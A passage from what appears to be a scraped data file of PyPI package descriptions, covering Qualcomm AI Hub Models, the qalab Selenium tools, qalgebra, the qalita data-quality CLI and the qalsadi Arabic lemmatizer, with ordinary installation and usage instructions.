and ready to deploy on Qualcomm\u00ae devices.Explore models optimized for on-device deployment of vision, speech, text, and genenrative AI.View open-source recipes to quantize, optimize, and deploy these models on-device.Browse throughperformance metricscaptured for these models on several devices.Access the models throughHugging Face.Sign upto run these models on hosted Qualcomm\u00ae devices.Supported runtimesTensorFlow LiteQualcomm AI Engine DirectSupported operating systems:Android 11+Supported compute unitsCPU, GPU, NPU (includesHexagon DSP,HTP)Supported precisionFloating Points: FP16Integer: INT8 (8-bit weight and activation on select models), INT4 (4-bit weight, 16-bit activation on select models)Supported chipsetsSnapdragon 845,Snapdragon 855/855+,Snapdragon 865/865+,Snapdragon 888/888+Snapdragon 8 Gen 1,Snapdragon 8 Gen 2,Snapdragon 8 Gen 3Select supported devicesSamsung Galaxy S21 Series, Galaxy S22 Series, Galaxy S23 Series, Galaxy S24 SeriesXiaomi 12, 13Google Pixel 3, 4, 5and many more.InstallationWe currently supportPython >=3.8 and <= 3.10.We recommend using a Python\nvirtual environment\n(minicondaorvirtualenv).You can setup a virtualenv using:python -m venv qai_hub_models_env && source qai_hub_models_env/bin/activateOnce the environment is setup, you can install the base package using:pipinstallqai_hub_modelsSome models (e.g.YOLOv7) require\nadditional dependencies. You can install those dependencies automatically\nusing:pipinstall\"qai_hub_models[yolov7]\"Getting StartedEach model comes with the following set of CLI demos:Locally runnable PyTorch based CLI demo to validate the model off device.On-device CLI demo that produces a model ready for on-device deployment and runs the model on a hosted Qualcomm\u00ae device (needssign up).All the models produced by these demos are freely available onHugging\nFaceor through ourwebsite. See the individual model readme\nfiles (e.g.YOLOv7) for more\ndetails.Local CLI Demo with PyTorchAll modelscontain CLI demos that run the model inPyTorchlocally with sample input. Demos are optimized for code clarity\nrather than latency, and run exclusively in PyTorch. Optimal model latency can\nbe achieved with model export viaQualcomm\u00ae AI\nHub.python-mqai_hub_models.models.yolov7.demoFor additional details on how to use the demo CLI, use the--helpoptionpython-mqai_hub_models.models.yolov7.demo--helpSee themodel directorybelow to explore all other models.Note that most ML use cases require some pre and post-processing that are not\npart of the model itself. A python reference implementation of this is provided\nfor each model inapp.py. 
Apps load & pre-process model input, run model\ninference, and post-process model output before returning it to you.Here is an example of how the PyTorch CLI works forYOLOv7:fromPILimportImagefromqai_hub_models.models.yolov7importModelasYOLOv7Modelfromqai_hub_models.models.yolov7importAppasYOLOv7Appfromqai_hub_models.utils.asset_loadersimportload_imagefromqai_hub_models.models.yolov7.demoimportIMAGE_ADDRESS# Load pre-trained modeltorch_model=YOLOv7Model.from_pretrained()# Load a simple PyTorch based applicationapp=YOLOv7App(torch_model)image=load_image(IMAGE_ADDRESS,\"yolov7\")# Perform prediction on a sample imagepred_image=app.predict(image)[0]Image.fromarray(pred_image).show()CLI demo to run on hosted Qualcomm\u00ae devicesSome modelscontain CLI demos that run the model on a hosted\nQualcomm\u00ae device usingQualcomm\u00ae AI Hub.To run the model on a hosted device,sign up for access to Qualcomm\u00ae AI\nHub. Sign-in to Qualcomm\u00ae AI Hub with your\nQualcomm\u00ae ID. Once signed in navigate to Account -> Settings -> API Token.With this API token, you can configure your client to run models on the cloud\nhosted devices.qai-hubconfigure--api_tokenAPI_TOKENNavigate todocsfor more information.The on-device CLI demo performs the following:Exports the model for on-device execution.Profiles the model on-device on a cloud hosted Qualcomm\u00ae device.Runs the model on-device on a cloud hosted Qualcomm\u00ae device and compares accuracy between a local CPU based PyTorch run and the on-device run.Downloads models (and other required assets) that can be deployed on-device in an Android application.python-mqai_hub_models.models.yolov7.exportMany models may have initialization parameters that allow loading custom\nweights and checkpoints. See--helpfor more detailspython-mqai_hub_models.models.yolov7.export--helpHow does this export script work?As described above, the script above compiles, optimizes, and runs the model on\na cloud hosted Qualcomm\u00ae device. 
The demo usesQualcomm\u00ae AI Hub's Python\nAPIs.Here is a simplified example of code that can be used to run the entire model\non a cloud hosted device:fromtypingimportTupleimporttorchimportqai_hubashubfromqai_hub_models.models.yolov7importModelasYOLOv7Model# Load YOLOv7 in PyTorchtorch_model=YOLOv7Model.from_pretrained()torch_model.eval()# Trace the PyTorch model using one data point of provided sample inputs to# torch tensor to trace the model.example_input=[torch.tensor(data[0])forname,dataintorch_model.sample_inputs().items()]pt_model=torch.jit.trace(torch_model,example_input)# Select a devicedevice=hub.Device(\"Samsung Galaxy S23\")# Compile model for a specific devicecompile_job=hub.submit_compile_job(model=pt_model,device=device,input_specs=torch_model.get_input_spec(),)# Get target model to run on a cloud hosted devicetarget_model=compile_job.get_target_model()# Profile the previously compiled model on a cloud hosted deviceprofile_job=hub.submit_profile_job(model=target_model,device=device,)# Perform on-device inference on a cloud hosted deviceinput_data=torch_model.sample_inputs()inference_job=hub.submit_inference_job(model=target_model,device=device,inputs=input_data,)# Returns the output as dict{name: numpy}on_device_output=inference_job.download_output_data()Working with source codeYou can clone the repository using:gitclonehttps://github.com/quic/ai-hub-models/blob/maincdmain\npipinstall-e.Install additional dependencies to prepare a model before using the following:cdmain\npipinstall-e\".[yolov7]\"All models have accuracy and end-to-end tests when applicable. These tests as\ndesigned to be run locally and verify that the PyTorch code produces correct\nresults. To run the tests for a model:python-mpytest--pyargsqai_hub_models.models.yolov7.testFor any issues, please contact us atai-hub-support@qti.qualcomm.com.Model DirectoryComputer VisionModelREADMETorch AppDevice ExportCLI DemoImage 
ClassificationMobileNet-v2-Quantizedqai_hub_models.models.mobilenet_v2_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fGoogLeNetqai_hub_models.models.googlenet\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fResNet50qai_hub_models.models.resnet50\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSwin-Smallqai_hub_models.models.swin_small\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fInception-v3Quantizedqai_hub_models.models.inception_v3_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fMobileNet-v3-Smallqai_hub_models.models.mobilenet_v3_small\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fGoogLeNetQuantizedqai_hub_models.models.googlenet_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fRegNetqai_hub_models.models.regnet\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fResNeXt50qai_hub_models.models.resnext50\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fVITqai_hub_models.models.vit\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fResNet18Quantizedqai_hub_models.models.resnet18_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fResNet101qai_hub_models.models.resnet101\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fResNeXt101qai_hub_models.models.resnext101\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fMobileNet-v2qai_hub_models.models.mobilenet_v2\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSqueezeNet-1_1qai_hub_models.models.squeezenet1_1\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSqueezeNet-1_1Quantizedqai_hub_models.models.squeezenet1_1_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fInception-v3qai_hub_models.models.inception_v3\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fWideResNet50qai_hub_models.models.wideresnet50\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fResNet101Quantizedqai_hub_models.models.resnet101_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fMNASNet05qai_hub_models.models.mnasnet05\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSwin-Baseqai_hub_models.models.swin_base\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fDenseNet-121qai_hub_models.models.densenet121\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fShufflenet-v2Quantizedqai_hub_models.models.shufflenet_v2_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fShufflenet-v2qai_hub_models.models.shufflenet_v2\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fResNeXt101Quantizedqai_hub_models.models.resnext101_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fResNet18qai_hub_models.models.resnet18\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fEfficientNet-B0qai_hub_models.models.efficientnet_b0\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fMobileNet-v3-Largeqai_hub_models.models.mobilenet_v3_large\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fWideResNet50-Quantizedqai_hub_models.models.wideresnet50_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fConvNext-Tinyqai_hub_models.models.convnext_tiny\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSwin-Tinyqai_hub_models.models.swin_tiny\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fImage EditingLaMa-Dilatedqai_hub_models.models.lama_dilated\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fImage GenerationStyleGAN2qai_hub_models.models.stylegan2\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSuper 
ResolutionQuickSRNetLargeqai_hub_models.models.quicksrnetlarge\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fESRGANqai_hub_models.models.esrgan\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fReal-ESRGAN-x4plusqai_hub_models.models.real_esrgan_x4plus\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fXLSR-Quantizedqai_hub_models.models.xlsr_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fQuickSRNetMediumqai_hub_models.models.quicksrnetmedium\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fReal-ESRGAN-General-x4v3qai_hub_models.models.real_esrgan_general_x4v3\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSESR-M5-Quantizedqai_hub_models.models.sesr_m5_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fQuickSRNetSmallqai_hub_models.models.quicksrnetsmall\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSESR-M5qai_hub_models.models.sesr_m5\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fXLSRqai_hub_models.models.xlsr\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSemantic SegmentationYolo-v8-Segmentationqai_hub_models.models.yolov8_seg\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSINetqai_hub_models.models.sinet\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fUnet-Segmentationqai_hub_models.models.unet_segmentation\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fFCN_ResNet50qai_hub_models.models.fcn_resnet50\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fDDRNet23-Slimqai_hub_models.models.ddrnet23_slim\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fFastSam-Sqai_hub_models.models.fastsam_s\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fFFNet-122NS-LowResqai_hub_models.models.ffnet_122ns_lowres\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fFFNet-78S-Quantizedqai_hub_models.models.ffnet_78s_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fFFNet-40S-Quantizedqai_hub_models.models.ffnet_40s_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fMediaPipe-Selfie-Segmentationqai_hub_models.models.mediapipe_selfie\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fDeepLabV3-ResNet50qai_hub_models.models.deeplabv3_resnet50\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fFastSam-Xqai_hub_models.models.fastsam_x\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fFFNet-54Sqai_hub_models.models.ffnet_54s\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fFFNet-78S-LowResqai_hub_models.models.ffnet_78s_lowres\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSegment-Anything-Modelqai_hub_models.models.sam\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fFFNet-78Sqai_hub_models.models.ffnet_78s\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fFFNet-40Sqai_hub_models.models.ffnet_40s\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fFFNet-54S-Quantizedqai_hub_models.models.ffnet_54s_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fObject DetectionMediaPipe-Hand-Detectionqai_hub_models.models.mediapipe_hand\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fDETR-ResNet50-DC5qai_hub_models.models.detr_resnet50_dc5\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fDETR-ResNet101-DC5qai_hub_models.models.detr_resnet101_dc5\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fYolo-v8-Detectionqai_hub_models.models.yolov8_det\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fDETR-ResNet101qai_hub_models.models.detr_resnet101\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fDETR-ResNet50qai_hub_models.models.detr_resnet50\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fYolo-v7qai_hub_models.models.yolov7\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fYolo-v6qai_hub_models.models.yolov6\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fMediaPipe-Face-Detectionqai_hub_models.models.mediapipe_face\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fPose 
EstimationHRNetPoseQuantizedqai_hub_models.models.hrnet_pose_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fMediaPipe-Pose-Estimationqai_hub_models.models.mediapipe_pose\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fLiteHRNetqai_hub_models.models.litehrnet\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fHRNetPoseqai_hub_models.models.hrnet_pose\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fOpenPoseqai_hub_models.models.openpose\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fAudioModelREADMETorch AppDevice ExportCLI DemoSpeech RecognitionWhisper-Baseqai_hub_models.models.whisper_asr\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fHuggingFace-WavLM-Base-Plusqai_hub_models.models.huggingface_wavlm_base_plus\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fAudio EnhancementFacebook-Denoiserqai_hub_models.models.facebook_denoiser\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fMultimodalModelREADMETorch AppDevice ExportCLI DemoTrOCRqai_hub_models.models.trocr\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fOpenAI-Clipqai_hub_models.models.openai_clip\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fGenerative AiModelREADMETorch AppDevice ExportCLI DemoImage GenerationStable-Diffusionqai_hub_models.models.stable_diffusion_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fControlNetqai_hub_models.models.controlnet_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fText GenerationLlama-v2-7B-Chatqai_hub_models.models.llama_v2_7b_chat_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fBaichuan-7Bqai_hub_models.models.baichuan_7b_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f"} +{"package": "qa-keys-test", "pacakge-description": "No description available on PyPI."} +{"package": "qal", "pacakge-description": "QAL is a Python library for mixing and merging data involving different sources and destinations.It supports several database backends and file formats."} +{"package": "qalab", "pacakge-description": "No description available on PyPI."} +{"package": "qalaboratory", "pacakge-description": "Branch nameQAlabQAcodeQAdminQAdocQAtestlinkmasterHow to install ?Clone this repo:git clonehttps://github.com/netzulo/qalab.gitEnter on repo directory:cd qalabClone submodules:git submodule update--init--recursiveAttach branches HEAD:git submodule foreach git checkout masterInstall qalab package: from PIPpip install qalaboratoryor from setup.py filepython setup.py installCommand Usageusage: qaenv.py [-h] [-v] [-sd SERVER_DRIVER] [-m MODE] [-i] [-s]\n [-p PLATFORM] [-dcp DRIVER_CONFIG_PATH]\n\nPerforms selenium drivers operations\n\noptional arguments:\n -h, --help show this help message and exit\n -v, --verbose verbose level... 
repeat up to three times.\n -sd SERVER_DRIVER, --server_driver SERVER_DRIVER\n Select server driver, values are:\n [selenium,appium,selendroid]\n -m MODE, --mode MODE Select mode, values are: [hub, node]\n -i, --install Download driver server jar\n -s, --start Start driver server jar\n -p PLATFORM, --platform PLATFORM\n Select mode, values are: [lin32,lin64,win32,win64]\n -dcp DRIVER_CONFIG_PATH, --driver_config_path DRIVER_CONFIG_PATH\n Use different absolute PATH+FILE_NAME to read\n DRIVER_CONFIG\n\n----- help us on , https://github.com/netzulo/qalab -------How to create HUB + Node ?HubCreate configuration :python qalab/qaenv.py--server_driverselenium--modehub--installStart Hub :python qalab/qaenv.py--server_driverselenium--modehub--startNodeCreate configuration :python qalab/qaenv.py--server_driverselenium--modenode--installStart Node :python qalab/qaenv.py selenium--server_driverselenium--modenode--start--platformwin64AppiumMust be installed SDK and appium (from NPM) as global packageInstall SDKInstall appium:npm install-gappiumCreate configuration :python qalab/qaenv.py--server_driverappium--modenode--installStart Node :python qalab/qaenv.py--server_driverappium--modenode--start--platformwin64Env nameEnv descriptionpy27,py34,py35,py36Python supported versionsdocsGenerate doc HTML in /docsflake8Exec linter in qalab/ tests/selenium-hubStart intalled selenium hubselenium-nodeStart intalled selenium nodeselendroid-hubStart intalled selendroid hubselendroid-nodeStart intalled selendroid nodeappium-nodeStart intalled appium nodeHow to exec tests ?Tests from setup.py file :python setup.py testInstall from PIP file :pip install toxTests from tox :tox-l&& tox-eTOX_ENV_NAME(see tox.ini file to get environment names)TOX Env nameEnv descriptionpy27,py34,py35,py36Python supported versionsflake8Exec linter in qalab/ tests/coverageGenerate XML and HTML reportsdocsGenerate doc HTML in /docsselenium-hubStart intalled selenium hubselenium-nodeStart intalled selenium nodeselendroid-hubStart intalled selendroid hubselendroid-nodeStart intalled selendroid nodeappium-nodeStart intalled appium nodeselenium-testsExecute Hub+Node testsQADriversDriversLinux 32Linux 64Windows 32Windows 64ChromeOKOKOKOKFirefoxOKOKOKOKPhantomJsOKOKOKOKInternet ExplorerOKOKEdgeOKOKAndroidOKOKOKOK"} +{"package": "qalgebra", "pacakge-description": "QAlgebraPython package for symbolic quantum algebra.Development of QAlgebra happens onGithub. You can read the full documentationonline.InstallationTo install the latest released version of QAlgebra, run this command in your terminal:pip install qalgebraThis is the preferred method to install QAlgebra, as it will always install the most recent stable release.If you don't havepipinstalled, thePython installation guide, respectively thePython Packaging User Guidecan guide you through the process.To install the latest development version of QAlgebra fromGithub.pip install git+https://github.com/qalgebra/qalgebra.git@master#egg=qalgebraUsageTo use QAlgebra in a project:import qalgebraHistory0.2.0 (2020-12-30)Initial alpha release0.1.0 (2018-12-06)Placeholder release"} +{"package": "qa-lib-factories", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "qalioss", "pacakge-description": "No description available on PyPI."} +{"package": "qalita", "pacakge-description": "QALITA Command Line Interface (CLI)QALITA Command Line Interface (CLI) is a tool intended to be used by Data Engineers who setup's QALITA Platform's agents, sources and assets.It gives easy to use command to help them make an up & running qalita platform's environment in no time.QALITA Command Line Interface (CLI)Quick StartInstallationUsageSetupMinimal ConfigConnected ConfigMake an .env file and export ENV Values:qalita agentqalita agent loginqalita agent runJobWorkerqalita agent joblistqalita agent infoqalita packqalita pack initqalita pack listqalita pack runqalita pack validateqalita pack pushqalita sourceqalita source addqalita source validateqalita source listqalita source pushHow to 'Pack' ?InitAt runtimePost runtimeQuick StartInstallationAs simple as :pipinstallqalitaor there is aDocker Imageavailable at :UsageIf you want to have more detailed and contextual help, typeqalita COMMAND -hUsage:qalita[OPTIONS]COMMAND[ARGS]...QALITACommandLineInterfaceSetupThis CLI command communicates with the QALITA Platform API backend.There are several layers of configuration depending of your needs :Minimal ConfigQALITA_AGENT_NAME=The agent will help you identify it in the frontend interface, there are no restrictions on the name.QALITA_AGENT_MODE=The mode of the agent :Job: In job mode, when you use the commandqalita agent run, it will immediately try to run a job on the local current context.Worker: In worker mode, when you use the commandqalita agent runit will wait for the backend to gives him jobs to run. It is simmilar to a scheduler.Note that the commandqalita agent runneeds more configuration to run correctly, it will displays error otherwise.Connected ConfigQALITA_AGENT_ENDPOINT=Example :http://localhost:3080/api/v1The agent url endpoint gives the ability for the agent to communicate with the qalita's platform endpoints, it enables :* Listing packs\n* Running Jobs\n* Publishing sources\n* Publishing packsQALITA_AGENT_TOKEN=The token is provided while doing the quickstart steps in the frontend app. 
It is associated with your user and your role.Note that you need to have at least the[Data Engineer]role to use the QALITA CLIMake an .env file and export ENV Values:You can alternatively make an .env file and export the values to your environment..env-localQALITA_AGENT_NAME=QALITA_AGENT_MODE=QALITA_AGENT_ENDPOINT=https://api.company.com/api/v1QALITA_AGENT_TOKEN=QALITA_PACK_NAME=Then export the values of the file to ENV values with :export$(xargs<.env-local)qalita agentTheqalita agentcommand allow you to :Register an agent to the platformGet information about your local agentRun a pack on a sourceList agent jobs (past & future)qalita agent loginParameters :name: the name of the agentmode: the mode of the agent token: the api token you get from the platformurl: the backend api url of the platformqalita agent loginregisters your local agent to the platform, it enables you to run jobs, or create routines (schedules) to run pack programmaticaly.You need to have configured your agent with :\n\n* QALITA_AGENT_ENDPOINT=\n* QALITA_AGENT_TOKEN=You can get your token from the frontend or with an OAUTH2 API call to the /users/signin backend's endpointMore info on your frontend documentation, and on theConnected configof the docqalita agent runParameters :--name: the name of the agent--mode: the mode of the agent --token: the api token you get from the platform--url: the backend api url of the platformSpecific parameters injobmode :--source: the source id you want to run your job against--source-version(optional) : the source version, by default it will run to the latest soruce version--pack: the pack id you want to run your job against--pack-version(optional) : the pack version, by default it will run the latest version of the packqalitaagentrunruns in different mode :JobThe agent will run given configuration-p: a pack_id given with theqalita pack list, note that your pack needs to be pushed to the platform in order to have an id.-s: a source_id given with theqalita source list, note that your source needs to be pushed to the platform in order to have an id.WorkerThe agent will wait until it receives an order from the frontend, it will then worke as same as in job mode.Note that this mode will run indefinitelyqalita agent joblistParameters :--name: the name of the agent--mode: the mode of the agent --token: the api token you get from the platform--url: the backend api url of the platformList jobs from the platform backend.qalita agent infoParameters :--name: the name of the agent--mode: the mode of the agent --token: the api token you get from the platform--url: the backend api url of the platformGet infos about your local agent configuration.qalita packTheqalita packcommand allow you to :Initialize a new packList all available packsValidate itRun a local packPush your pack version to the platformqalita pack initParameters :--name: the name of the packInitialize a new pack, you need to have set aname, it will create a newfolderwith the name of the pack.You can set your name by passing a new parameters to the commandline or setting a new environment variable :QALITA_PACK_NAME=.Here is the arborescence created :./_pack/\n /run.sh # Entrypoint file that will be run with qalita agent run\n /README.md # Documentation file\n /properties.yaml # Properties file that contains properties about the pack\n /main.py # (pack specific) The main script (you can run your pack with whatever langage you choose)\n /config.json # (pack specific) The config file of your pack, you can use it to set any configurations you 
like.\n /requirements.txt # (pack specific) The requirements file that is run inside the run.shqalita pack listParameters :You need to have logged in withqalita agent loginList all the packs that are accessible to you with the Qalita Platform.qalita pack runParameters :--name: Pack nameRun your locally configured packqalita pack validateParameters :--name: Pack nameValidate your locally configured packqalita pack pushParameters :--name: Pack namePush your locally configured packqalita sourceTheqalita sourcecommand allow you to :Add a new source to your local configurationList your local sources from yourqalita-conf.ymlfilePush your local sources from yourqalita-conf.ymlfileValidate your conf fileqalita-conf.ymlNote , by default theqalita-conf.ymlfile is stored to~/.qalita/qalita-conf.yml, setQALITA_HOMEenv to customize the default path.qalita source addThis function will help you add a new source to your configuration fileqalita-conf.yamlThis command doesn't have parameters, you need to follow command prompts.Prompt 1: Source namePrompt 2: Source typePrompt 3: Is conditionnal, depends on the source type.Case : Source Type =file: Source pathCase : Source Type =database: host / port / username / password / databasePrompt 4: Source descriptionPrompt 5: Is the source a reference ? [bool] (default : false)Prompt 6: Is the source sensistive ? [bool] (default : false)Prompt 7: Visibility of the source (private, internal, public) (default : private)At the end of the prompt, the cli will check reachability of the source depending of theconfigurationandtype, this step is calledvalidate_sourceto complete the process of registering a new source to the platform, you need to push your source with the command :qalita source pushqalita source validateHelper function to help you add a new source to your configuration fileqalita-conf.yamlqalita source listParameters :You need to have aqalita-conf.yamlfile that contains your sources configuration.Exemple :version:1sources:-config:path:/home/user/data_dirdescription:Folder containing csv filesname:my_csv_filesowner:userreference:falsevisibility:privatesensitive:falsetype:fileIn this exemple we have :General keysKeyTypeDescriptionversionintThe version of the configurationsourceslistThe list of sourcesSource keysKeyTypeDescriptionnamestringThe name of the sourcedescriptionstringThe description of the sourceownerstringThe owner of the sourcetypestringThe type of the sourceconfigdictThe configuration of the sourcevisibilitystringThe visibility of the source referenceboolIs the source a reference sourcesensitiveboolIs the source containing sensitive dataqalita source pushRegisters your sources to the platformNote: If you want to run a pack on your source, you will first need to push your source to the platform. It will give you a source_id with which you can run your pack.How to 'Pack' ?A pack is an entity run by the agent, it can be created by anyone.It's purpose is to process the source and retrieve usefull informations about it to feed back into the platform.InitTo create the base pack, see :qalita pack init.At runtimeThe entrypoint of the pack is therun.shfile that is located at theroot pathof the temp local folder created by the agent.run.shExample :#/bin/bashpython-mpipinstall--quiet-rrequirements.txtpythonmain.pyThe pack is feed by asource_conf.jsonfile containing the source'sconfig:data. 
This file is located alongside therun.shentrypoint.source_conf.jsonExample :{\"config\":{\"path\":\"/home/lucas/desktop\"},\"description\":\"Desktop files\",\"id\":1,\"name\":\"local_data\",\"owner\":\"lucas\",\"type\":\"file\",\"reference\":false,\"sensitive\":false,\"visibility\":\"private\",\"validate\":\"valid\"}Note : The pack is responsible for managing itself it'ssource typecompatibility by checking the sourcetypein thesource_conf.jsonfile.Post runtimeA the end of the pack run, the agent searchs for :logs.txt: File uploaded to give feedback logs to the platform in the frontend.logs.txtExample :2023-07-21 11:51:12,688 - qalita.commands.pack - INFO - ------------- Pack Run -------------\n2023-07-21 11:51:15,087 - qalita.commands.pack - INFO - CSV files found:\n2023-07-21 11:51:15,222 - qalita.commands.pack - ERROR - Summarize dataset: 0%| | 0/5 [00:00\",\"scope\":\"\",\"content\":\"\"},{...}...]}metrics.jsonMetrics file contains the metrics given by the pack about the source.metrics.jsonExample :{[{\"scope\":\"\",\"key\":\"\",\"value\":\"\"},{...}...]}Metrics & recommendations are pushed to the platform and are then available to the source's pack run view."} +{"package": "qalita_core", "pacakge-description": "No description available on PyPI."} +{"package": "qalsadi", "pacakge-description": "Qalsadi Arabic Morphological Analyzer and Lemmatizer for PythonDeveloppers: Taha Zerrouki:http://tahadz.comtaha dot zerrouki at gmail dot comFeaturesvalueAuthorsAuthors.mdRelease0.5LicenseGPLTrackerlinuxscout/qalsadi/IssuesWebsitehttps://pypi.python.org/pypi/qalsadiDocpackage DocumentaionSourceGithubDownloadsourceforgeFeedbacksCommentsAccounts@Twitter@SourceforgeCitationIf you would cite it in academic work, can you use this citationT. Zerrouki\u200f, Qalsadi, Arabic mophological analyzer Library for python., https://pypi.python.org/pypi/qalsadi/Another Citation:Zerrouki, Taha. \"Towards An Open Platform For Arabic Language Processing.\" (2020).or in bibtex format@misc{zerrouki2012qalsadi,title={qalsadi, Arabic mophological analyzer Library for python.},author={Zerrouki, Taha},url={https://pypi.python.org/pypi/qalsadi},year={2012}}```bibtex@thesis{zerrouki2020towards,title={Towards An Open Platform For Arabic Language Processing},author={Zerrouki, Taha},year={2020}}Features \u0645\u0632\u0627\u064a\u0627LemmatizationVocalized Text Analyzer,Use Qutrub library to analyze verbs.give word frequency in Arabic modern use.ApplicationsStemming textsText Classification and categorizationSentiment AnalysisNamed Entities RecognitionInstallationpip install qalsadiRequirementspip install -r requirements.txtUsageDemoThe demo is available onTahadz.com>Tools/\u064eAnalysis \u0642\u0633\u0645 \u0623\u062f\u0648\u0627\u062a - \u062a\u062d\u0644\u064a\u0644ExampleLemmatization>>>importqalsadi.lemmatizer>>>text=u\"\"\"\u0647\u0644 \u062a\u062d\u062a\u0627\u062c \u0625\u0644\u0649 \u062a\u0631\u062c\u0645\u0629 \u0643\u064a \u062a\u0641\u0647\u0645 \u062e\u0637\u0627\u0628 \u0627\u0644\u0645\u0644\u0643\u061f \u0627\u0644\u0644\u063a\u0629 \"\u0627\u0644\u0643\u0644\u0627\u0633\u064a\u0643\u064a\u0629\" (\u0627\u0644\u0641\u0635\u062d\u0649) \u0645\u0648\u062c\u0648\u062f\u0629 \u0641\u064a \u0643\u0644 \u0627\u0644\u0644\u063a\u0627\u062a \u0648\u0643\u0630\u0644\u0643 \u0627\u0644\u0644\u063a\u0629 \"\u0627\u0644\u062f\u0627\u0631\u062c\u0629\" .. 
